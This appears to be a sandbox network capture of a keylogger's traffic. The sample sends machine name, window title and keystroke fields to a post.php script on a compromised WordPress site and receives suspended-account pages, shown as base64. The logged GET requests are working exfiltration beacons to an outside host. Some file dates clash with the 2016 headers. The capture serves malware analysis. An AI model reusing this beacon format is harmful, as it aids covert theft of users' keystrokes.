0 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:53%20AM text/html post.php 302 Found HTML 379.0 B 05/18/91 00:21:45
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9ODo1
MyUyMEFNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
59eff5f164b6a02b6e3ebbc9a1e48ab55ad0afc4427aaea75827273188f6af02
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:53%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Tue, 29 Nov 2016 16:53:42 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:53%20AM
Content-Length: 379
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
1 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:53%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 05/21/91 19:17:03
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=8:53%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Tue, 29 Nov 2016 16:53:42 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
2 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20PM text/html post.php 302 Found HTML 345.0 B 03/16/39 11:56:43
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0xOjUzJTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
3ba90f33cd4d3990c3edd1e01d34f879f034329f310c871f3859028621956106
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Tue, 29 Nov 2016 21:53:51 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
3 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=1:53%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/16/39 21:37:08
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
